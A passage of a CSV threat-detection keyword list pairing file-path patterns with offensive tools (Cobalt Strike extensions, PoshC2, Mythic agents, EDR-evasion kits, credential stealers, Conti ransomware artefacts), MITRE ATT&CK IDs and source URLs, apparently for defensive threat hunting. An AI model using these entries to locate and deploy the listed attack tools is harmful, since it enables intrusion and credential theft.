- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/opt/nessus/*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/opt/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/opt/Password_Cracking/*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/opt/rai/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/opt/seclists/Discovery/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/optiv/Dent/*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*/oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/orbitaldump.git*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*/oscp.profile*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/out:spacerunner.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*/outfile:C:\ProgramData\hashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/outflanknl/*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*/output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/output/ratchatPT*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/OWASP*","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Web Attacks","https://github.com/OWASP","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/p_cve-2014-9322.tar.gz*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/p292/Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*/p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/package/portscan/*.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/padre/pkg/exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*/paensy.cpp*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*/papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*/paranoidninja/*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*/parrot/iso/*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrot-mirror/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrot-on-docker/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrotsec/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*/parsers/nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*/passhash.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*/passive_sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/password/mimipenguin/*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" 